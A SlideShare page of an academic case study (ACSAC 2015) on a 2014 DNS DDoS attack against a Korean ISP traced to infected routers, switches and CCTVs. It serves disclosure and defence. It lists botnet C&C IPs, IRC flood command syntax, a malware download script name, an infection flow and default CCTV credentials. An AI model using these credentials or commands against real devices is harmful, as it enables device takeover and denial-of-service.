SlideShare a Scribd company logo
1 of 31
SANE(Security Analysis aNd Evaluation) Lab.
Ki-Taek LEE*, Seungsoo BAEK, Seungjoo KIM**
zizihacker@korea.ac.kr, baek.seungsoo@gmail.com, skim71@korea.ac.kr
CIST (Center for Information Security Technologies), Korea University
*1st Author, **Corresponding Author
Case Study :
DDoS Attack on DNS
using infected IoT Devices
ACSAC 2015
2
Acknowledgement
This research was supported by the MSIP(Ministry of Science, ICT and
Future Planning), Korea, under the ITRC(Information Technology
Research Center) support program (IITP-2015-R0992-15-1006)
supervised by the IITP(Institute for Information & communications
Technology Promotion)
3
Internet down after cyberattack
29 November, 2014
15,000,000 packets per second
SK Broadband, one of the largest providers of broadband Internet access in
Korea, was attacked by the Distributed Denial-of-Service (DDoS) over the
weekend, disconnecting its Internet services for about an hour.
DDoS is a kind of cyberattack in which multiple compromised systems are
used to target a single network or a machine and make it unavailable to
users.
On Saturday at 10:55 a.m., the traffic on SK Broadband’s DNS server soared
up to 15 million packets per second (PPS), from its usual average of about 1
million PPS. PPS refers to the number of database transactions performed
per second.
SK Broadband users near Seocho and Dongjak distrcts in southern Seoul
were without Internet from 10:55 a.m. until 12:05 p.m. on Saturday.
[1] Internet down after cyberattack (JOONGANG DAILY, Dec 2014)
4
Internet down after cyberattack
169,640 182,589
9,136,090
# DNS Request Queries /1 Minute
more 50 times traffic incoming for DDoS attack
Time
DNS Request queries
Nov 29th, 2014
Avg. queries
5
How to detect DDoS attack
• Our own <Near-Real Time DNS Query Analyzing System for Detecting
DDoS Attacks>
6
How to detect DDoS attack
• Our own <Near-Real Time DNS Query Analyzing System for Detecting
DDoS Attacks>
[2] Study on the near-real time DNS query analyzing system for DNS amplification attacks, KIISC (2015)
7
Zombie PCs? Zombie Devices!
• We analyzed the IP addresses of packets and found out
the cause of attack.
• The attack came from IoT devices such as home routers,
network switches, network-connected CCTVs and
STBs(SetTop Box) of IPTV, not computers which are
generally used for DDoS attack.
8
Benefits of IoT device for DDoS
Why do attacker want to use IoT device for DDoS attack?
Any TIME
communication
Any THING
communication
Any PLACE
communication
• on the move
• night
• daytime
• outdoor
• indoor (away from the computer)
• at the computer
• between computers
• human to human, not using a computer
• human to thing, using generic equipment
• thing to thing
[3] The new dimension introduced in the Internet of things - Recommendation ITU-T Y.2060 (06/2012)
9
Top 10 IoT Vulnerabilities (2014)
A list of the top 10 internet of things vulnerabilities
[4] OWASP Internet of Things Project (https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project)
Rank Title
I1 Insecure Web Interface
I2 Insufficient Authentication/Authorization
I3 Insecure Network Services
I4 Lack of Transport Encryption
I5 Privacy Concerns
I6 Insecure Cloud Interface
I7 Insecure Mobile Interface
I8 Insufficient Security Configurability
I9 Insecure Software/Firmware
I10 Poor Physical Security
10
Case 1. Home router
• Tracing source IP addresses of DDoS and identifying the devices
11
Case 1. Home router
• Connecting to admin pages of home router
12
Case 1. Home router
• Connecting to telnet for analysis
• Some weird processes are running.
13
Case 1. Home router
• Download firmware from the home router
• Reverse engineer the firmware
- Use busybox to download malware
- 192.3.205.154 is used as C&C and distribution server
- 217.71.50.13 is used as distribution server
14
Case 1. Home router
• It would spread by finding new devices using a random scan of IP
address.
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags
(syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval,
default 10)
15
Case 1. Home router
• Get malwares from the distribution server and bin.sh
Name Size
arm 98KB
arm.i64 1,105KB
i586 77KB
i586.i64 985KB
i686 79KB
mips 122KB
mipsel 125KB
ppc 92KB
sparc 105KB
superh 60KB
16
Case 2. Network Switch
• Similar to “Case 1”, but something is different
17
Case 2. Network Switch
18
Case 2. Network Switch
• Malicious commands
19
Case 2. Network Switch
• Source code
[5] Lightaidra, https://github.com/eurialo/lightaidra
20
Case 2. Network Switch
Basic group Aidra group
File list arm, mips, mipsel, ppc,s,sh
mips_aidra, superh_aidra, arm_aidra, mipsel
_aidra
C&C or
distribution
Server IP
automation.whatismyip.com
(72.233.89.199)
IRC connect
76.73.104.50:6667
76.73.103.60:6667
76.73.104.243:6667
205.188.14.92:6667
Command list
Access Commands (login/logout)
Miscs Commands (run/check)
Scan Commands (scan)
DDoS Commands
.spoof <IP> : ip spoofing attack
.synflood , .nssynflood
.ackflood, .nsackflood
Attack Command
.synflood
.*flood->[m,a,p,s,x]
<example>
.nssynflood->s <host> <port> <secs>
* : syn, nssyn, ack, nsack
a=arm / p=ppc /
s=superh / x=x86
21
Case 2. Network Switch
Basic group Aidra group
configure spoof (ip spoofing)
advscan (after scan on B Class, check id/pass or access telnet to infect to device )
Attack
running
Version check
Run attack script include update malware)
/var/run/getbinaries.sh mips_aidra
superh_aidra
arm_aidra
ppc_aidra
</var/run/getbinaries.sh >
76.73.104.50
46.40.191.171
<OOO_aidra>
217.23.10.250
22
Case 3. CCTV
• Trace source IP address of DDoS attack and find out a management
page of CCTV
23
Case 3. CCTV
• Malwares on CCTV
- password is changed
- update with infected firmware (get root permission)
• rtsp://<CCTV IP>/trackID=1&basic_auth=base64([id:pw])
- root / (empty)
- root / root
- root / admin
- admin / admin
- admin / 1234
- admin / 12345
- admin / smcadmin
- admin / (empty)
24
Case 3. CCTV
• Scanning 120,000,000 IP over the internet with the tool and found
23,507 CCTV IP
• Vulnerable CCTVs are 9,063 among them
• Default id, password are commonly used
25
A mount of infected device
• Approximately 2,000,000,000 of IP
Home router,
1,151,940
Network Switch,
19,754
CCTV, 23,507
STB, 2
others, 4,349
(0.36%)
(96.03%)
(1.65%)
(1.95%)
(0.00%)
26
Infection flow of IoT
Attacker or
infected IoT device
IoT device
(Victim)
① IP range scan
② access to victim’s IP through telnet or web
③ attack with default (ID, password) or remote command execution
④ upload malicious code
① delete temp files and directories
② kill main services(telnet, main daemon and…)
③ download & overwrite infected busybox from C&C server
④ delete the downloaded file at ③
⑤ overwrite infected busybox to main daemon
⑥ delete the infected busybox at ⑤
⑦ execute main deamon
⑧ block and kill telnet, ssh using iptables for protecting itself
External
infection flow
Internal
infection flow
27
Conclusion
• The Internet of Things(IoT) is beginning to grow significantly.
• IoT devices have many vulnerabilities.
• All devices can be zombie devices.
• We need more active defenses.
28
Future works
• Automatic vulnerabilities scanner for IoT
29
Future works
• Automatic vulnerabilities scanner for IoT
30
Future works
• Automatic vulnerabilities scanner for IoT
31
E-Mail : zizihacker@korea.ac.kr, zizihacker@gmail.com
Thanks for your attention.
Questions ?

More Related Content

What's hot

How to launch and defend against a DDoS
How to launch and defend against a DDoSHow to launch and defend against a DDoS
How to launch and defend against a DDoS
jgrahamc
 
Entropy based DDos Detection in SDN
Entropy based DDos Detection in SDNEntropy based DDos Detection in SDN
Entropy based DDos Detection in SDN
Vishal Vasudev
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
Kaustubh Padwad
 

What's hot (20)

10 DDoS Mitigation Techniques
10 DDoS Mitigation Techniques10 DDoS Mitigation Techniques
10 DDoS Mitigation Techniques
 
Breach and attack simulation tools
Breach and attack simulation toolsBreach and attack simulation tools
Breach and attack simulation tools
 
How to launch and defend against a DDoS
How to launch and defend against a DDoSHow to launch and defend against a DDoS
How to launch and defend against a DDoS
 
Entropy and denial of service attacks
Entropy and denial of service attacksEntropy and denial of service attacks
Entropy and denial of service attacks
 
DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
 
Entropy based DDos Detection in SDN
Entropy based DDos Detection in SDNEntropy based DDos Detection in SDN
Entropy based DDos Detection in SDN
 
Honeypots - Tracking the Blackhat Community
Honeypots - Tracking the Blackhat CommunityHoneypots - Tracking the Blackhat Community
Honeypots - Tracking the Blackhat Community
 
Hunt down the evil of your infrastructure
Hunt down the evil of your infrastructureHunt down the evil of your infrastructure
Hunt down the evil of your infrastructure
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
 
DDoS Attack and Mitigation
DDoS Attack and MitigationDDoS Attack and Mitigation
DDoS Attack and Mitigation
 
Network security
Network securityNetwork security
Network security
 
DDoS ATTACKS
DDoS ATTACKSDDoS ATTACKS
DDoS ATTACKS
 
Denial of service attack
Denial of service attackDenial of service attack
Denial of service attack
 
What is DDoS ?
What is DDoS ?What is DDoS ?
What is DDoS ?
 
5 Ways To Fight A DDoS Attack
5 Ways To Fight A DDoS Attack5 Ways To Fight A DDoS Attack
5 Ways To Fight A DDoS Attack
 
Строим ханипот и выявляем DDoS-атаки
Строим ханипот и выявляем DDoS-атакиСтроим ханипот и выявляем DDoS-атаки
Строим ханипот и выявляем DDoS-атаки
 
DDoS-bdNOG
DDoS-bdNOGDDoS-bdNOG
DDoS-bdNOG
 
DDoS Attack
DDoS AttackDDoS Attack
DDoS Attack
 
DDoS attacks
DDoS attacksDDoS attacks
DDoS attacks
 
Infoblox Secure DNS Solution
Infoblox Secure DNS SolutionInfoblox Secure DNS Solution
Infoblox Secure DNS Solution
 

Viewers also liked

Viewers also liked (20)

Problem and Improvement of the Composition Documents for Smart Card Composed ...
Problem and Improvement of the Composition Documents for Smart Card Composed ...Problem and Improvement of the Composition Documents for Smart Card Composed ...
Problem and Improvement of the Composition Documents for Smart Card Composed ...
 
Using the CGC's Fully Automated Vulnerability Detection Tools in Security Eva...
Using the CGC's Fully Automated Vulnerability Detection Tools in Security Eva...Using the CGC's Fully Automated Vulnerability Detection Tools in Security Eva...
Using the CGC's Fully Automated Vulnerability Detection Tools in Security Eva...
 
DNS DDoS Attack and Risk
DNS DDoS Attack and RiskDNS DDoS Attack and Risk
DNS DDoS Attack and Risk
 
보안실무, 어디까지가실무일까? @ 보안대첩 (2014.10.31)
보안실무, 어디까지가실무일까? @ 보안대첩 (2014.10.31)보안실무, 어디까지가실무일까? @ 보안대첩 (2014.10.31)
보안실무, 어디까지가실무일까? @ 보안대첩 (2014.10.31)
 
Developing a Protection Profile for Smart TV
Developing a Protection Profile for Smart TVDeveloping a Protection Profile for Smart TV
Developing a Protection Profile for Smart TV
 
성균인으로 사는 법 - 방황하고 있는 후배님들께 -
성균인으로 사는 법 - 방황하고 있는 후배님들께 -성균인으로 사는 법 - 방황하고 있는 후배님들께 -
성균인으로 사는 법 - 방황하고 있는 후배님들께 -
 
Smart TV Security - #1984 in 21st century -
Smart TV Security - #1984 in 21st century -Smart TV Security - #1984 in 21st century -
Smart TV Security - #1984 in 21st century -
 
PP for E-Certificate Issuance System
PP for E-Certificate Issuance SystemPP for E-Certificate Issuance System
PP for E-Certificate Issuance System
 
Hacking, Surveilling, and Deceiving Victims on Smart TV
Hacking, Surveilling, and Deceiving Victims on Smart TVHacking, Surveilling, and Deceiving Victims on Smart TV
Hacking, Surveilling, and Deceiving Victims on Smart TV
 
Исполнение бюджета Гапкинского сельского поселения за 1 полугодие 2016 года
Исполнение бюджета Гапкинского сельского поселения за 1 полугодие  2016 годаИсполнение бюджета Гапкинского сельского поселения за 1 полугодие  2016 года
Исполнение бюджета Гапкинского сельского поселения за 1 полугодие 2016 года
 
Исполнение бюджета Гапкинского сельского поселения за 1 квартал 2016 года
Исполнение бюджета Гапкинского сельского поселения за 1 квартал  2016 годаИсполнение бюджета Гапкинского сельского поселения за 1 квартал  2016 года
Исполнение бюджета Гапкинского сельского поселения за 1 квартал 2016 года
 
Sketch root locus
Sketch root locusSketch root locus
Sketch root locus
 
Writing the report for doctoral confirmation at Massey University, New Zealand
Writing the report for doctoral confirmation at Massey University, New ZealandWriting the report for doctoral confirmation at Massey University, New Zealand
Writing the report for doctoral confirmation at Massey University, New Zealand
 
Distributed concurrency control
Distributed concurrency controlDistributed concurrency control
Distributed concurrency control
 
Tesina Sobri
Tesina SobriTesina Sobri
Tesina Sobri
 
Concurrency control
Concurrency controlConcurrency control
Concurrency control
 
IoT DDoS Attacks: the stakes have changed
IoT DDoS Attacks: the stakes have changed IoT DDoS Attacks: the stakes have changed
IoT DDoS Attacks: the stakes have changed
 
Validation based protocol
Validation based protocolValidation based protocol
Validation based protocol
 
IoT: Security & Privacy at IGNITE 2015
IoT: Security & Privacy at IGNITE 2015IoT: Security & Privacy at IGNITE 2015
IoT: Security & Privacy at IGNITE 2015
 
Validation Protocol
Validation ProtocolValidation Protocol
Validation Protocol
 

Similar to DDoS Attack on DNS using infected IoT Devices

CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CanSecWest
 

Similar to DDoS Attack on DNS using infected IoT Devices (20)

Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...
Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...
Understanding Cyber Industrial Controls in the Manufacturing and Utilities En...
 
ioT-SecurityECC-v1
ioT-SecurityECC-v1ioT-SecurityECC-v1
ioT-SecurityECC-v1
 
CIRA Labs - Secure Home Gateway Project 2019-03.pptx
CIRA Labs - Secure Home Gateway Project 2019-03.pptxCIRA Labs - Secure Home Gateway Project 2019-03.pptx
CIRA Labs - Secure Home Gateway Project 2019-03.pptx
 
DDoS.ppt
DDoS.pptDDoS.ppt
DDoS.ppt
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
[GITSN] wireless data security system
[GITSN] wireless data security system[GITSN] wireless data security system
[GITSN] wireless data security system
 
Detecting and Confronting Flash Attacks from IoT Botnets
Detecting and Confronting Flash Attacks from IoT BotnetsDetecting and Confronting Flash Attacks from IoT Botnets
Detecting and Confronting Flash Attacks from IoT Botnets
 
DDOS Mitigation Experience from IP ServerOne by CL Lee
DDOS Mitigation Experience from IP ServerOne by CL LeeDDOS Mitigation Experience from IP ServerOne by CL Lee
DDOS Mitigation Experience from IP ServerOne by CL Lee
 
Avast @ Machine Learning
Avast @ Machine LearningAvast @ Machine Learning
Avast @ Machine Learning
 
Internet Security
Internet SecurityInternet Security
Internet Security
 
Internet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issuesInternet of Things - Privacy and Security issues
Internet of Things - Privacy and Security issues
 
The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...
The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...
The Bot Stops Here: Removing the BotNet Threat - Public and Higher Ed Securit...
 
CyberSecurity Best Practices for the IIoT
CyberSecurity Best Practices for the IIoTCyberSecurity Best Practices for the IIoT
CyberSecurity Best Practices for the IIoT
 
Security events in 2014
Security events in 2014Security events in 2014
Security events in 2014
 
IoT Security: How Your TV and Thermostat are Attacking the Internet
IoT Security: How Your TV and Thermostat are Attacking the InternetIoT Security: How Your TV and Thermostat are Attacking the Internet
IoT Security: How Your TV and Thermostat are Attacking the Internet
 
20320140501016
2032014050101620320140501016
20320140501016
 
ML13198A410.pdf
ML13198A410.pdfML13198A410.pdf
ML13198A410.pdf
 
ML13198A410.pdf
ML13198A410.pdfML13198A410.pdf
ML13198A410.pdf
 
ML13198A410.pdf
ML13198A410.pdfML13198A410.pdf
ML13198A410.pdf
 
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
OWASP Appsec USA 2014 Talk "Pwning the Pawns with Wihawk" Santhosh Kumar
 

More from Seungjoo Kim

More from Seungjoo Kim (20)

블록체인의 본질과 동작 원리
블록체인의 본질과 동작 원리블록체인의 본질과 동작 원리
블록체인의 본질과 동작 원리
 
[Blockchain and Cryptocurrency] 01. Syllabus
[Blockchain and Cryptocurrency] 01. Syllabus[Blockchain and Cryptocurrency] 01. Syllabus
[Blockchain and Cryptocurrency] 01. Syllabus
 
[Blockchain and Cryptocurrency] 02. Blockchain Overview and Introduction - Te...
[Blockchain and Cryptocurrency] 02. Blockchain Overview and Introduction - Te...[Blockchain and Cryptocurrency] 02. Blockchain Overview and Introduction - Te...
[Blockchain and Cryptocurrency] 02. Blockchain Overview and Introduction - Te...
 
[Blockchain and Cryptocurrency] 03. Blockchain's Theoretical Foundation, Cryp...
[Blockchain and Cryptocurrency] 03. Blockchain's Theoretical Foundation, Cryp...[Blockchain and Cryptocurrency] 03. Blockchain's Theoretical Foundation, Cryp...
[Blockchain and Cryptocurrency] 03. Blockchain's Theoretical Foundation, Cryp...
 
[Blockchain and Cryptocurrency] 04. Bitcoin and Nakamoto Blockchain
[Blockchain and Cryptocurrency] 04. Bitcoin and Nakamoto Blockchain[Blockchain and Cryptocurrency] 04. Bitcoin and Nakamoto Blockchain
[Blockchain and Cryptocurrency] 04. Bitcoin and Nakamoto Blockchain
 
[Blockchain and Cryptocurrency] 05. Ethereum and Smart Contract
[Blockchain and Cryptocurrency] 05. Ethereum and Smart Contract[Blockchain and Cryptocurrency] 05. Ethereum and Smart Contract
[Blockchain and Cryptocurrency] 05. Ethereum and Smart Contract
 
[Blockchain and Cryptocurrency] 06. NFT and Metaverse
[Blockchain and Cryptocurrency] 06. NFT and Metaverse[Blockchain and Cryptocurrency] 06. NFT and Metaverse
[Blockchain and Cryptocurrency] 06. NFT and Metaverse
 
[Blockchain and Cryptocurrency] 07. Cardano(ADA) and Other Altcoins
[Blockchain and Cryptocurrency] 07. Cardano(ADA) and Other Altcoins[Blockchain and Cryptocurrency] 07. Cardano(ADA) and Other Altcoins
[Blockchain and Cryptocurrency] 07. Cardano(ADA) and Other Altcoins
 
[Blockchain and Cryptocurrency] 08. Dark Coins
[Blockchain and Cryptocurrency] 08. Dark Coins[Blockchain and Cryptocurrency] 08. Dark Coins
[Blockchain and Cryptocurrency] 08. Dark Coins
 
[Blockchain and Cryptocurrency] 09. Blockchain Usage Beyond Currency - Way to...
[Blockchain and Cryptocurrency] 09. Blockchain Usage Beyond Currency - Way to...[Blockchain and Cryptocurrency] 09. Blockchain Usage Beyond Currency - Way to...
[Blockchain and Cryptocurrency] 09. Blockchain Usage Beyond Currency - Way to...
 
Why is it getting harder to train the cybersecurity workforce? (ExtendedVersion)
Why is it getting harder to train the cybersecurity workforce? (ExtendedVersion)Why is it getting harder to train the cybersecurity workforce? (ExtendedVersion)
Why is it getting harder to train the cybersecurity workforce? (ExtendedVersion)
 
Kid Blockchain - Everything You Need to Know - (Part 2)
Kid Blockchain - Everything You Need to Know - (Part 2)Kid Blockchain - Everything You Need to Know - (Part 2)
Kid Blockchain - Everything You Need to Know - (Part 2)
 
Kid Blockchain - Everything You Need to Know - (Part 1)
Kid Blockchain - Everything You Need to Know - (Part 1)Kid Blockchain - Everything You Need to Know - (Part 1)
Kid Blockchain - Everything You Need to Know - (Part 1)
 
Application of the Common Criteria to Building Trustworthy Automotive SDLC
Application of the Common Criteria to Building Trustworthy Automotive SDLCApplication of the Common Criteria to Building Trustworthy Automotive SDLC
Application of the Common Criteria to Building Trustworthy Automotive SDLC
 
Assurance-Level Driven Method for Integrating Security into SDLC Process
Assurance-Level Driven Method for Integrating Security into SDLC ProcessAssurance-Level Driven Method for Integrating Security into SDLC Process
Assurance-Level Driven Method for Integrating Security into SDLC Process
 
How South Korea Is Fighting North Korea's Cyber Threats
How South Korea Is Fighting North Korea's Cyber ThreatsHow South Korea Is Fighting North Korea's Cyber Threats
How South Korea Is Fighting North Korea's Cyber Threats
 
Blockchain for Cyber Defense: Will It Be As Good As You Think?
Blockchain for Cyber Defense: Will It Be As Good As You Think?Blockchain for Cyber Defense: Will It Be As Good As You Think?
Blockchain for Cyber Defense: Will It Be As Good As You Think?
 
Post-Coronavirus 시대 보안 패러다임의 변화
Post-Coronavirus 시대 보안 패러다임의 변화Post-Coronavirus 시대 보안 패러다임의 변화
Post-Coronavirus 시대 보안 패러다임의 변화
 
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
IoT Device Hacking and New Direction of IoT Security Evaluation Using Common ...
 
Verification of IVI Over-The-Air using UML/OCL
Verification of IVI Over-The-Air using UML/OCLVerification of IVI Over-The-Air using UML/OCL
Verification of IVI Over-The-Air using UML/OCL
 

Recently uploaded

Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Lovely Professional University
 
Final DBMS Manual (2).pdf final lab manual
Final DBMS Manual (2).pdf final lab manualFinal DBMS Manual (2).pdf final lab manual
Final DBMS Manual (2).pdf final lab manual
BalamuruganV28
 
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...
drjose256
 
Microkernel in Operating System | Operating System
Microkernel in Operating System | Operating SystemMicrokernel in Operating System | Operating System
Microkernel in Operating System | Operating System
Sampad Kar
 

Recently uploaded (20)

Insurance management system project report.pdf
Insurance management system project report.pdfInsurance management system project report.pdf
Insurance management system project report.pdf
 
How to Design and spec harmonic filter.pdf
How to Design and spec harmonic filter.pdfHow to Design and spec harmonic filter.pdf
How to Design and spec harmonic filter.pdf
 
5G and 6G refer to generations of mobile network technology, each representin...
5G and 6G refer to generations of mobile network technology, each representin...5G and 6G refer to generations of mobile network technology, each representin...
5G and 6G refer to generations of mobile network technology, each representin...
 
Theory for How to calculation capacitor bank
Theory for How to calculation capacitor bankTheory for How to calculation capacitor bank
Theory for How to calculation capacitor bank
 
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
Activity Planning: Objectives, Project Schedule, Network Planning Model. Time...
 
Final DBMS Manual (2).pdf final lab manual
Final DBMS Manual (2).pdf final lab manualFinal DBMS Manual (2).pdf final lab manual
Final DBMS Manual (2).pdf final lab manual
 
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...
Tembisa Central Terminating Pills +27838792658 PHOMOLONG Top Abortion Pills F...
 
Vip ℂall Girls Karkardooma Phone No 9999965857 High Profile ℂall Girl Delhi N...
Vip ℂall Girls Karkardooma Phone No 9999965857 High Profile ℂall Girl Delhi N...Vip ℂall Girls Karkardooma Phone No 9999965857 High Profile ℂall Girl Delhi N...
Vip ℂall Girls Karkardooma Phone No 9999965857 High Profile ℂall Girl Delhi N...
 
Online book store management system project.pdf
Online book store management system project.pdfOnline book store management system project.pdf
Online book store management system project.pdf
 
Linux Systems Programming: Semaphores, Shared Memory, and Message Queues
Linux Systems Programming: Semaphores, Shared Memory, and Message QueuesLinux Systems Programming: Semaphores, Shared Memory, and Message Queues
Linux Systems Programming: Semaphores, Shared Memory, and Message Queues
 
Lesson no16 application of Induction Generator in Wind.ppsx
Lesson no16 application of Induction Generator in Wind.ppsxLesson no16 application of Induction Generator in Wind.ppsx
Lesson no16 application of Induction Generator in Wind.ppsx
 
Lab Manual Arduino UNO Microcontrollar.docx
Lab Manual Arduino UNO Microcontrollar.docxLab Manual Arduino UNO Microcontrollar.docx
Lab Manual Arduino UNO Microcontrollar.docx
 
Microkernel in Operating System | Operating System
Microkernel in Operating System | Operating SystemMicrokernel in Operating System | Operating System
Microkernel in Operating System | Operating System
 
Involute of a circle,Square, pentagon,HexagonInvolute_Engineering Drawing.pdf
Involute of a circle,Square, pentagon,HexagonInvolute_Engineering Drawing.pdfInvolute of a circle,Square, pentagon,HexagonInvolute_Engineering Drawing.pdf
Involute of a circle,Square, pentagon,HexagonInvolute_Engineering Drawing.pdf
 
Supermarket billing system project report..pdf
Supermarket billing system project report..pdfSupermarket billing system project report..pdf
Supermarket billing system project report..pdf
 
Filters for Electromagnetic Compatibility Applications
Filters for Electromagnetic Compatibility ApplicationsFilters for Electromagnetic Compatibility Applications
Filters for Electromagnetic Compatibility Applications
 
Operating System chapter 9 (Virtual Memory)
Operating System chapter 9 (Virtual Memory)Operating System chapter 9 (Virtual Memory)
Operating System chapter 9 (Virtual Memory)
 
Artificial Intelligence Bayesian Reasoning
Artificial Intelligence Bayesian ReasoningArtificial Intelligence Bayesian Reasoning
Artificial Intelligence Bayesian Reasoning
 
Multivibrator and its types defination and usges.pptx
Multivibrator and its types defination and usges.pptxMultivibrator and its types defination and usges.pptx
Multivibrator and its types defination and usges.pptx
 
Quiz application system project report..pdf
Quiz application system project report..pdfQuiz application system project report..pdf
Quiz application system project report..pdf
 

DDoS Attack on DNS using infected IoT Devices

  • 1. SANE(Security Analysis aNd Evaluation) Lab. Ki-Taek LEE*, Seungsoo BAEK, Seungjoo KIM** zizihacker@korea.ac.kr, baek.seungsoo@gmail.com, skim71@korea.ac.kr CIST (Center for Information Security Technologies), Korea University *1st Author, **Corresponding Author Case Study : DDoS Attack on DNS using infected IoT Devices ACSAC 2015
  • 2. 2 Acknowledgement This research was supported by the MSIP(Ministry of Science, ICT and Future Planning), Korea, under the ITRC(Information Technology Research Center) support program (IITP-2015-R0992-15-1006) supervised by the IITP(Institute for Information & communications Technology Promotion)
  • 3. 3 Internet down after cyberattack 29 November, 2014 15,000,000 packets per second SK Broadband, one of the largest providers of broadband Internet access in Korea, was attacked by the Distributed Denial-of-Service (DDoS) over the weekend, disconnecting its Internet services for about an hour. DDoS is a kind of cyberattack in which multiple compromised systems are used to target a single network or a machine and make it unavailable to users. On Saturday at 10:55 a.m., the traffic on SK Broadband’s DNS server soared up to 15 million packets per second (PPS), from its usual average of about 1 million PPS. PPS refers to the number of database transactions performed per second. SK Broadband users near Seocho and Dongjak distrcts in southern Seoul were without Internet from 10:55 a.m. until 12:05 p.m. on Saturday. [1] Internet down after cyberattack (JOONGANG DAILY, Dec 2014)
  • 4. 4 Internet down after cyberattack 169,640 182,589 9,136,090 # DNS Request Queries /1 Minute more 50 times traffic incoming for DDoS attack Time DNS Request queries Nov 29th, 2014 Avg. queries
  • 5. 5 How to detect DDoS attack • Our own <Near-Real Time DNS Query Analyzing System for Detecting DDoS Attacks>
  • 6. 6 How to detect DDoS attack • Our own <Near-Real Time DNS Query Analyzing System for Detecting DDoS Attacks> [2] Study on the near-real time DNS query analyzing system for DNS amplification attacks, KIISC (2015)
  • 7. 7 Zombie PCs? Zombie Devices! • We analyzed the IP addresses of packets and found out the cause of attack. • The attack came from IoT devices such as home routers, network switches, network-connected CCTVs and STBs(SetTop Box) of IPTV, not computers which are generally used for DDoS attack.
  • 8. 8 Benefits of IoT device for DDoS Why do attacker want to use IoT device for DDoS attack? Any TIME communication Any THING communication Any PLACE communication • on the move • night • daytime • outdoor • indoor (away from the computer) • at the computer • between computers • human to human, not using a computer • human to thing, using generic equipment • thing to thing [3] The new dimension introduced in the Internet of things - Recommendation ITU-T Y.2060 (06/2012)
  • 9. 9 Top 10 IoT Vulnerabilities (2014) A list of the top 10 internet of things vulnerabilities [4] OWASP Internet of Things Project (https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project) Rank Title I1 Insecure Web Interface I2 Insufficient Authentication/Authorization I3 Insecure Network Services I4 Lack of Transport Encryption I5 Privacy Concerns I6 Insecure Cloud Interface I7 Insecure Mobile Interface I8 Insufficient Security Configurability I9 Insecure Software/Firmware I10 Poor Physical Security
  • 10. 10 Case 1. Home router • Tracing source IP addresses of DDoS and identifying the devices
  • 11. 11 Case 1. Home router • Connecting to admin pages of home router
  • 12. 12 Case 1. Home router • Connecting to telnet for analysis • Some weird processes are running.
  • 13. 13 Case 1. Home router • Download firmware from the home router • Reverse engineer the firmware - Use busybox to download malware - 192.3.205.154 is used as C&C and distribution server - 217.71.50.13 is used as distribution server
  • 14. 14 Case 1. Home router • It would spread by finding new devices using a random scan of IP address. TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
  • 15. 15 Case 1. Home router • Get malwares from the distribution server and bin.sh Name Size arm 98KB arm.i64 1,105KB i586 77KB i586.i64 985KB i686 79KB mips 122KB mipsel 125KB ppc 92KB sparc 105KB superh 60KB
  • 16. 16 Case 2. Network Switch • Similar to “Case 1”, but something is different
  • 18. 18 Case 2. Network Switch • Malicious commands
  • 19. 19 Case 2. Network Switch • Source code [5] Lightaidra, https://github.com/eurialo/lightaidra
  • 20. 20 Case 2. Network Switch Basic group Aidra group File list arm, mips, mipsel, ppc,s,sh mips_aidra, superh_aidra, arm_aidra, mipsel _aidra C&C or distribution Server IP automation.whatismyip.com (72.233.89.199) IRC connect 76.73.104.50:6667 76.73.103.60:6667 76.73.104.243:6667 205.188.14.92:6667 Command list Access Commands (login/logout) Miscs Commands (run/check) Scan Commands (scan) DDoS Commands .spoof <IP> : ip spoofing attack .synflood , .nssynflood .ackflood, .nsackflood Attack Command .synflood .*flood->[m,a,p,s,x] <example> .nssynflood->s <host> <port> <secs> * : syn, nssyn, ack, nsack a=arm / p=ppc / s=superh / x=x86
